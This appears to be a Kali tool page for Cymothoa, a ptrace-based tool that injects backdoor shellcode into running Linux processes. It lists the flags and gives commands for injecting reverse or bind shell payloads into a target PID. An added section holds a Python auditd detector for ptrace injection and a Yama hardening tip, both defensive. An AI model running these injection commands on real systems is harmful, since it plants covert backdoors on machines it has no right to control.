Tags: Exploitation, backdoor, shellcode, injection, ptrace, stealth

Cymothoa

Cymothoa is a stealth backdooring tool that injects backdoor shellcode into an existing process. It uses the ptrace system call to manipulate and infect processes on *nix systems.

Description

Cymothoa enables stealthy backdoors by injecting shellcode into running processes without creating new detectable processes. This makes it useful for post-exploitation scenarios where maintaining persistence discreetly is critical. The tool targets memory regions with specific permissions, ensuring the shellcode executes reliably within the host process.

Use cases include red team operations, penetration testing, and research into process injection techniques. It supports various shellcode payloads, such as reverse shells and bind shells, configurable via command-line arguments. Cymothoa is particularly effective on Linux systems due to ptrace availability.

The tool includes companion utilities like bgrep for binary pattern searching and udp_server for UDP-based interactions with certain payloads.

How It Works

Cymothoa uses the ptrace system call to attach to a target process by PID, then injects shellcode into a memory region mapped with 'r-xp' (readable, executable) permissions (default /lib/ld). It allocates persistent memory for the payload's data in a region mapped 'rw-p' (readable, writable). Payload execution can use threading, forking, or alarm scheduling, with options to customize behavior such as timers, IP/port bindings, and authentication.
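Because the injection is done entirely through ptrace, the attach-then-write sequence is what a host-based detection can key on. The following is an added example (not part of the Cymothoa project or this page) that parses auditd SYSCALL records, as produced by a rule such as `-a always,exit -F arch=b64 -S ptrace -k ptrace`, and reports tracers that attached to a process and then wrote into its memory. The audit lines are constructed samples, and the tracer allowlist is an assumed site-specific setting.

```python
import re
from collections import defaultdict

# Constructed auditd SYSCALL records (not real captures). On x86_64, syscall 101 is ptrace;
# a0 is the request (0x10 ATTACH, 0x4206 SEIZE, 0x4 POKETEXT, 0x5 POKEDATA, 0x11 DETACH),
# a1 is the traced pid. Records 2 and 3 model shellcode being written into the target.
SAMPLE_AUDIT = """\
type=SYSCALL msg=audit(1713200000.101:2001): arch=c000003e syscall=101 success=yes exit=0 a0=10 a1=4d2 a2=0 a3=0 pid=3210 uid=1000 comm="cymothoa" exe="/usr/bin/cymothoa"
type=SYSCALL msg=audit(1713200000.102:2002): arch=c000003e syscall=101 success=yes exit=0 a0=5 a1=4d2 a2=7f3c1e2b1000 a3=9090909090909090 pid=3210 uid=1000 comm="cymothoa" exe="/usr/bin/cymothoa"
type=SYSCALL msg=audit(1713200000.103:2003): arch=c000003e syscall=101 success=yes exit=0 a0=4 a1=4d2 a2=7f3c1e2b1008 a3=9090909090909090 pid=3210 uid=1000 comm="cymothoa" exe="/usr/bin/cymothoa"
type=SYSCALL msg=audit(1713200000.105:2004): arch=c000003e syscall=101 success=yes exit=0 a0=11 a1=4d2 a2=0 a3=0 pid=3210 uid=1000 comm="cymothoa" exe="/usr/bin/cymothoa"
type=SYSCALL msg=audit(1713200500.001:2010): arch=c000003e syscall=101 success=yes exit=0 a0=10 a1=1a4 a2=0 a3=0 pid=4100 uid=1000 comm="gdb" exe="/usr/bin/gdb"
type=SYSCALL msg=audit(1713200500.002:2011): arch=c000003e syscall=101 success=yes exit=0 a0=4 a1=1a4 a2=5555555551a0 a3=cc pid=4100 uid=1000 comm="gdb" exe="/usr/bin/gdb"
type=SYSCALL msg=audit(1713200600.000:2020): arch=c000003e syscall=257 success=yes exit=3 a0=ffffff9c a1=55d0c2a1e3f0 a2=0 a3=0 pid=5 uid=0 comm="bash" exe="/usr/bin/bash"
"""

PTRACE_SYSCALL_X86_64 = 101
ATTACH_REQUESTS = {0x10, 0x4206}   # PTRACE_ATTACH, PTRACE_SEIZE
WRITE_REQUESTS = {0x4, 0x5}        # PTRACE_POKETEXT, PTRACE_POKEDATA
ALLOWED_TRACERS = {"/usr/bin/gdb", "/usr/bin/strace"}   # assumed site-specific allowlist

FIELD_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')

def parse_record(line):
    """Split one audit record into key -> value (quotes stripped); None unless it is a SYSCALL record."""
    fields = {k: v.strip('"') for k, v in FIELD_RE.findall(line)}
    return fields if fields.get("type") == "SYSCALL" else None

def find_injection_sessions(audit_text):
    """Group ptrace calls by (tracer pid, tracee pid) and return the sessions in which a
    non-allowlisted tracer attached to a process and then wrote into its memory."""
    sessions = defaultdict(lambda: {"exe": None, "attached": False, "writes": 0})
    for line in audit_text.splitlines():
        rec = parse_record(line)
        if not rec or int(rec.get("syscall", -1)) != PTRACE_SYSCALL_X86_64:
            continue
        request, tracee = int(rec["a0"], 16), int(rec["a1"], 16)
        session = sessions[(int(rec["pid"]), tracee)]
        session["exe"] = rec.get("exe")
        if request in ATTACH_REQUESTS:
            session["attached"] = True
        elif request in WRITE_REQUESTS:
            session["writes"] += 1
    return {key: s for key, s in sessions.items()
            if s["attached"] and s["writes"] and s["exe"] not in ALLOWED_TRACERS}

if __name__ == "__main__":
    for (tracer, tracee), s in find_injection_sessions(SAMPLE_AUDIT).items():
        print(f"ALERT: pid {tracer} ({s['exe']}) attached to pid {tracee} and wrote {s['writes']} words")
```

As a preventive control, raising the Yama sysctl `kernel.yama.ptrace_scope` to 1 limits PTRACE_ATTACH to a process's own descendants, and 2 restricts it to CAP_SYS_PTRACE holders, which blocks this injection path for an unprivileged attacker.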

Installation

```bash
sudo apt install cymothoa
```

Flags

-p    process pid
-s    shellcode number
-l    memory region name for shellcode injection (default /lib/ld), search for "r-xp" permissions
-m    memory region name for persistent memory (default /lib/ld), search for "rw-p" permissions
-h    print this help screen
-S    list available shellcodes
-f    fork parent process
-F    don't fork parent process
-b    create payload thread (probably you need also -F)
-B    don't create payload thread
-w    pass persistent memory address
-W    don't pass persistent memory address
-a    use alarm scheduler
-A    don't use alarm scheduler
-j    set timer (seconds)
-k    set timer (microseconds)
-x    set the IP
-y    set the port number
-r    set the port number 2
-z    set the username (4 bytes)
-o    set the password (8 bytes)
-c    set the script code (ex: "#!/bin/sh\nls; exit 0")

Examples

Print the help screen showing usage and options:

```bash
cymothoa -h
```

List available shellcodes:

```bash
cymothoa -S
```

Basic usage: inject the given shellcode number into process PID using the default memory regions:

```bash
cymothoa -p <pid> -s <shellcode_number>
```

Start the UDP server on the specified port for Cymothoa (usage: udp_server port):

```bash
udp_server port
```

Binary grep to search for hex patterns in files or paths:

```bash
bgrep <hex> [<path> ...]
```

Inject shellcode with a custom IP and port for a reverse/bind shell:

```bash
cymothoa -p <pid> -s <shellcode_number> -x <IP> -y <port>
```

Inject shellcode with forking and threading enabled:

```bash
cymothoa -p <pid> -s <shellcode_number> -f -b
```
Updated 2026-04-16 (kali.org)